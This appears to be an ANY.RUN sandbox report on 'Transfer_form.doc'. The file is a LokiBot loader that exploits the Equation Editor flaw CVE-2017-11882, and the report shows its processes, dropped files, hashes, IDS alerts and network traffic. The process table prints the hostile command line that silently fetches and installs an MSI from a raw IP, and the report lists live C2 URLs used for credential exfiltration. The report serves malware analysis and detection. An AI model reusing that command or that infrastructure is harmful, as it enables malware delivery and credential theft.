analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Transfer_form.doc

Full analysis: https://app.any.run/tasks/990056f3-66da-4ac7-b9be-bafcb97f98b8
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 14, 2018, 09:59:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
exe-to-msi
loader
lokibot
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

F0A003804EEA2A6EC1369EBA39760195

SHA1:

FCDD751D040F3EC4DCB44EF3AC43E2E044C8A8FA

SHA256:

A8F943FE3ADF0573E117011AE388DA7DE4FF878753F73CAC27C6E77F3B1B0F33

SSDEEP:

768:QmKfcZpEHUqUisx+NLBEzpaebiglLGF2cjZYGLLhB/CTWaPek+D/:Q4ZcUisxYthjjXkY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2820)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 560)

    • Downloads executable files from IP

      • msiexec.exe (PID: 2440)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2440)

    • Connects to CnC server

      • MSI438F.tmp (PID: 1540)

    • Actions looks like stealing of personal data

      • MSI438F.tmp (PID: 1540)

    • Detected artifacts of LokiBot

      • MSI438F.tmp (PID: 1540)

    • LOKIBOT was detected

      • MSI438F.tmp (PID: 1540)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 560)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2440)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2440)
      • MSI438F.tmp (PID: 1540)

    • Loads DLL from Mozilla Firefox

      • MSI438F.tmp (PID: 1540)

    • Creates files in the user directory

      • MSI438F.tmp (PID: 1540)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3512)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3512)

    • Application was dropped or rewritten from another process

      • MSI438F.tmp (PID: 2064)
      • MSI438F.tmp (PID: 1540)

    • Application was crashed

      • EQNEDT32.EXE (PID: 560)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 2440)
      • MSI438F.tmp (PID: 2064)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2440)

    • Application launched itself

      • MSI438F.tmp (PID: 2064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe msi438f.tmp no specs #LOKIBOT msi438f.tmp

Process information

PID
CMD
Path
Indicators
Parent process
3512"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Transfer_form.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
560"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2820cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/in.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3452msiexec.exe /i http://34.244.180.39/in.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2440C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2064"C:\Windows\Installer\MSI438F.tmp"C:\Windows\Installer\MSI438F.tmpmsiexec.exe
User:
admin
Company:
Sanipractic8
Integrity Level:
MEDIUM
Description:
cheroot8
Exit code:
0
Version:
2.06.0008
1540C:\Windows\Installer\MSI438F.tmp"C:\Windows\Installer\MSI438F.tmp
MSI438F.tmp
User:
admin
Company:
Sanipractic8
Integrity Level:
MEDIUM
Description:
cheroot8
Version:
2.06.0008
Total events
1 438
Read events
741
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
3
Text files
12
Unknown types
9

Dropped files

PID
Process
Filename
Type
3512WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3207.tmp.cvr
MD5:
SHA256:
2440msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF905ED063495CED22.TMP
MD5:
SHA256:
2440msiexec.exeC:\Config.Msi\184217.rbs
MD5:
SHA256:
2440msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF43B23A66BB98F760.TMP
MD5:
SHA256:
3512WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
1540MSI438F.tmpC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
2440msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2440msiexec.exeC:\Windows\Installer\MSI4050.tmpexecutable
MD5:1FEE3CFE72C1168E486A03714C6821BA
SHA256:EA1A11E2FD55D99F57DF9F7917A6551DBCF0699F420B7F120967F75E105324D6
2440msiexec.exeC:\Windows\Installer\184216.ipibinary
MD5:EFF40014070A91F3E605166D3E835BAB
SHA256:98897A0E575B2AB057AD205CE88A8D9CD84CB7CA2EA44810D51462181CEC700C
2064MSI438F.tmpC:\Users\admin\AppData\Local\Temp\~DF6435BDB840BFCF99.TMPbinary
MD5:0A9CC223F55E1AB7F187D0A714FC25A3
SHA256:94A1368D4210D8BF798AE77308B41D2D367BD560E0123349B6C536ED4ED7D560
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
7
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2440
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/in.msi
IE
executable
1.27 Mb
suspicious
1540
MSI438F.tmp
POST
404
185.246.152.229:80
http://sahakyanshn.com/baby/five/fre.php
unknown
text
15 b
malicious
1540
MSI438F.tmp
POST
87.236.22.87:80
http://sahakyanshn.com/baby/five/fre.php
RU
malicious
1540
MSI438F.tmp
POST
404
185.246.152.229:80
http://sahakyanshn.com/baby/five/fre.php
unknown
binary
23 b
malicious
1540
MSI438F.tmp
POST
404
185.246.152.229:80
http://sahakyanshn.com/baby/five/fre.php
unknown
binary
23 b
malicious
1540
MSI438F.tmp
POST
404
185.246.152.229:80
http://sahakyanshn.com/baby/five/fre.php
unknown
binary
23 b
malicious
1540
MSI438F.tmp
POST
404
185.246.152.229:80
http://sahakyanshn.com/baby/five/fre.php
unknown
text
15 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1540
MSI438F.tmp
185.246.152.229:80
sahakyanshn.com
malicious
2440
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious
1540
MSI438F.tmp
87.236.22.87:80
sahakyanshn.com
Beget Ltd
RU
malicious

DNS requests

Domain
IP
Reputation
sahakyanshn.com
  • 185.246.152.229
  • 87.236.22.87
unknown

Threats

PID
Process
Class
Message
2440
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2440
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2440
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2440
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1540
MSI438F.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1540
MSI438F.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
1540
MSI438F.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1540
MSI438F.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1540
MSI438F.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
1540
MSI438F.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
6 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Transfer_form.doc